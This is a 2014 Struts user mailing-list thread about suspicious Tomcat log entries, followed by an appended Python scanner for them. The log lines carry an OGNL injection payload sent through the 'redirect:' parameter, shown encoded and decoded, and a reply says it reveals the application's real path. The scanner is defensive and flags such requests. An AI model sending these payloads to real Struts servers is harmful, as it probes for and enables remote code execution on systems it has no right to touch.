struts-user mailing list archives

From JOSE L MARTINEZ-AVIAL <jlm...@gmail.com>
Subject Re: Security Issues & Vulnerability
Date Thu, 30 Jan 2014 21:36:53 GMT
What version of Struts are you using? It seems

60.15.137.72 - - [27/Jan/2014:17:51:48 +0530] "GET
/common/test2.action?redirect:$%7B%23a%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23b%3d%23a.getRealPath(%22/%22),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23b),%23matt.getWriter().flush(),%23matt.getWriter().close()%7D
HTTP/1.0" 200 74

transforms to

60.15.137.72 - - [27/Jan/2014:17:51:48 +0530] "GET
/common/test2.action?redirect:${#a=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),#b=#a.getRealPath("/"),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#b),#matt.getWriter().flush(),#matt.getWriter().close()}
HTTP/1.0" 200 74

That basically returns on the response the real path of your application.





2014-01-30 Amol Ghotankar <ghotankarua50@gmail.com>

> I have seen some sample app for testing which was developed using struts2.
>
> I saw some unknown files getting uploaded on test,
>
> I initially thought that my tomcat was hacked or my server was hacked but
> now after a close analysis it looks like a struts2 webwork security issue or
> vulnerability or maybe my misconfigurations or something, not sure
>
> Can anyone in the struts2 team fix this globally and help me to get rid of
> this locally without version upgrades.....
>
> Here are the tomcat logs which clearly tell the story
>
> 60.15.137.72 - - [27/Jan/2014:17:51:48 +0530] "GET
>
> /common/test.action?redirect:$%7B%23a%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23b%3d%23a.getRealPath(%22/%22),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23b),%23matt.getWriter().flush(),%23matt.getWriter().close()%7D
> HTTP/1.0" 200 74
>
> 60.15.137.72 - - [27/Jan/2014:17:51:48 +0530] "GET
>
> /common/test2.action?redirect:$%7B%23a%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23b%3d%23a.getRealPath(%22/%22),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23b),%23matt.getWriter().flush(),%23matt.getWriter().close()%7D
> HTTP/1.0" 200 74
>
> 60.15.137.72 - - [27/Jan/2014:17:51:49 +0530] "GET
>
> /common/test3.action?redirect:$%7B%23a%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23b%3d%23a.getRealPath(%22/%22),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23b),%23matt.getWriter().flush(),%23matt.getWriter().close()%7D
> HTTP/1.0" 200 74
>
>
> I hope my issue is clear and valid.
>
> Original issue on stackoverflow at
>
> http://stackoverflow.com/questions/21104956/tomcat-files-getting-uploaded-security-loophole
>
>
>
>
> --
>
>
>
> *With Best Regards,*
>
> Amol Ghotankar
> Technical Lead
> M: +91 9960 980 419 <http://www.cursivetech.com>
>
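
Added example, not part of the original thread or of Struts itself: a small scanner that percent-decodes Tomcat access-log lines as done by hand above and flags requests where a special parameter prefix is followed by an OGNL expression. The function names and sample lines are constructed for illustration; `action:` and `redirectAction:` go beyond the `redirect:` prefix seen in this thread, and the log layout is assumed to match the lines quoted here.

```python
import re
from urllib.parse import unquote

# Common Log Format as in the quoted lines: host ident user [time] "request" status bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>.*)" (?P<status>\d{3}) \S+$')
REQ_RE = re.compile(r'^(?P<method>\S+) (?P<target>.*?)(?: HTTP/[\d.]+)?$')
# A special parameter prefix directly followed by an OGNL opener (${ or %{).
# "redirect:" is the prefix seen in this thread; "action:" and
# "redirectAction:" are the sibling Struts 2 prefixes, added here.
OGNL_RE = re.compile(r'[?&](?P<prefix>redirectAction|redirect|action):\s*[$%]\{')


def decode_fully(value, max_rounds=3):
    """Percent-decode until stable so nested encoding cannot hide the marker."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def scan(lines):
    """Return one finding per access-log line carrying prefix + OGNL expression."""
    findings = []
    for line in lines:
        entry = LOG_RE.match(line.strip())
        request = entry and REQ_RE.match(entry.group("req"))
        if not request:
            continue  # not an access-log line in the assumed layout
        target = decode_fully(request.group("target"))
        hit = OGNL_RE.search(target)
        if hit:
            findings.append({
                "ip": entry.group("ip"), "time": entry.group("ts"),
                "path": target.split("?", 1)[0],
                "prefix": hit.group("prefix"),
                "status": int(entry.group("status")),
            })
    return findings


# Constructed sample lines (documentation addresses, harmless expressions).
SAMPLE = [
    '192.0.2.10 - - [27/Jan/2014:17:51:48 +0530] "GET /common/test.action?redirect:$%7B%23a%3d1%7D HTTP/1.0" 200 74',
    '192.0.2.10 - - [27/Jan/2014:17:51:49 +0530] "GET /common/test2.action?x=1&action:%2525%257B1%257D HTTP/1.0" 404 0',
    '192.0.2.20 - - [27/Jan/2014:17:52:01 +0530] "GET /common/list.action?redirect=home HTTP/1.0" 200 512',
]
```

`scan(SAMPLE)` reports the first two lines and skips the ordinary `redirect=home` parameter; the status field is kept in each finding so that hits answered with 200 can be reviewed first.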
